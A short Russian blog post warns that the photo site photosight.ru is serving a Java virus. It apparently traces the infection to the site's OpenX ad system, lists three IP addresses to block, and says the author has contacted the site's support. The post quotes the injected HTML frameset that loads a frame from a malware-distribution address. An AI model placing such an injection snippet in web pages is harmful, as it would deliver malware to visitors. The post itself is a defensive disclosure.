Осторожно, вирусы

Сайт photosight.ru сегодня радует своих посетителей java-вирусом. Браузер открывает страницу по коду: <html><frameset rows="100%"><frame src="http://194.8.250.211/tds/in.cgi?2"></frameset></html> и скачивает вирус. Рекомендую заблокировать следующие адреса:
178.63.170.185 (код)
194.8.250.213 (код)
194.8.250.211 (тело вируса)

Сайт уже попал в черный список Google и браузеры выводят предупреждающую страницу.

Как именно подгружается скрипт пока не наковырял, предполагаю, что есть уязвимость в рекламной (баннерной) системе openx1.photosight.ru.

UPDATE

Зараженный файл: http://openx1.photosight.ru/www/delivery/ajs.php

Написал письмо в службу поддержки сайта.


Теги: , , , , , , , ,

Оставить комментарий

Пожалуйста будьте вежливы и пишите по теме. Ваш e-mail никогда не будет опубликован.

Вы должны быть авторизированы,чтобы оставить комментарий.